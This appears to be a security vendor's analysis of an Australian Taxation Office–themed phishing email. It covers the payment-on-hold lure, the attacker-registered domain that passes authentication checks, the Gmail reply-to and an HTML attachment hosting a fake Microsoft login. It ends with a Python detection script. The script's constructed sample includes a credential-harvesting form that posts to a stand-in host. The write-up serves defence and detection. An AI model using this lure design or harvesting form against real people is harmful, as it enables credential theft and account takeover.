Impersonating the Australian Taxation Office, this attack informs the email recipient that they have received a new funds transfer and advises them that the payment is on hold pending identity verification. Attached to the email is a supposed payment slip with additional details about the payment. The email was sent from a maliciously registered domain, with a Gmail reply-to address. At the bottom of the email, the Australian Government Tax Office logo reinforces the theme and makes the phishing email appear more legitimate.

ATO phishing email

When a recipient opens the referenced attachment, they are presented with a Microsoft phishing page that has pre-populated their email address and states that their password needs to be verified “because you’re accessing sensitive info.”

HTML attachment phishing page

Why It Bypassed Traditional Security

The URL found within the HTML attachment had not been previously detected as malicious, allowing it to bypass traditional tools that rely on known bad indicators. The email's reply-to address points to a Gmail account, a free webmail service available to anyone, so there is no bad domain reputation for traditional security providers to discover. Because the sending domain was registered by the attacker, the email also passes all authentication checks for SPF, DKIM, and DMARC.

Detecting the Attack

HTML attachments are commonly used to deliver phishing payloads without having to include the malicious content in the email itself. An analysis of the HTML file identified a URL that had not been previously detected as malicious, allowing it to bypass traditional tools that rely on known bad indicators. In addition to understanding the intent of the link, a cloud email security platform analyzes the content of the email to determine whether it is malicious.
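As an added illustration (not the vendor's detection logic), the following Python script applies the header and attachment checks described above to a constructed sample message: a reply-to domain that differs from the sender and belongs to a free webmail provider, an HTML attachment, the URLs it references, and a password field beside a pre-filled email address. All addresses, domains and file names are made up.

```python
import email
import re
from email import policy

FREE_WEBMAIL = {"gmail.com", "outlook.com", "hotmail.com", "yahoo.com"}
URL_RE = r'(?:href|src|action)=["\']?(https?://[^"\'\s>]+)'

# Constructed sample, not the real phish: attacker-registered sender domain,
# Gmail Reply-To, and an HTML "payment slip" attachment hosting a login form.
SAMPLE_EML = """\
From: ATO Payments <payments@ato-refund.example>
Reply-To: ato.support.2023@gmail.com
To: staff@victim.example
Subject: New funds transfer on hold - identity verification required
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; name="PaymentSlip.html"
Content-Disposition: attachment; filename="PaymentSlip.html"

<html><body><form action="https://login-verify.example/auth/post" method="post">
<input name="email" value="staff@victim.example">
<input type="password" name="pass">
</form><script src="https://cdn.example/track.js"></script></body></html>
--b1--
"""

def analyze(raw):
    msg = email.message_from_string(raw, policy=policy.default)
    from_dom = msg["From"].addresses[0].domain.lower()
    reply_dom = (msg["Reply-To"] or msg["From"]).addresses[0].domain.lower()
    report = {
        "reply_to_mismatch": reply_dom != from_dom,  # replies leave sender domain
        "reply_to_free_webmail": reply_dom in FREE_WEBMAIL,
        "html_attachment": False,
        "attachment_urls": [],
        "credential_form": False,
    }
    for part in msg.iter_attachments():
        if part.get_content_type() != "text/html":
            continue
        report["html_attachment"] = True
        html = part.get_content()
        report["attachment_urls"] += re.findall(URL_RE, html, re.I)
        # Password field next to a pre-filled address is the lure described above
        report["credential_form"] = ('type="password"' in html.lower()
            and re.search(r'<input[^>]*value="[^"]*@', html, re.I) is not None)
    report["verdict"] = "phishing" if report["credential_form"] and (
        report["reply_to_mismatch"] or report["reply_to_free_webmail"]) else "review"
    return report
```

The extracted URLs are what a content-analysis pipeline would inspect next; the header and form checks fire even when none of those URLs has a reputation record yet.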

Risk to Organization

As soon as an employee enters their credentials, attackers have access to their email accounts, which can be used to gather sensitive information or to launch attacks on coworkers, customers, or vendors.

Analysis Overview

Vector: Payload-based

Goal: Credential Theft

Tactic: Free Webmail Account; Spoofed Display Name

Theme: Account Verification; Fake Payment Receipt

Impersonated Brands: Australian Taxation Office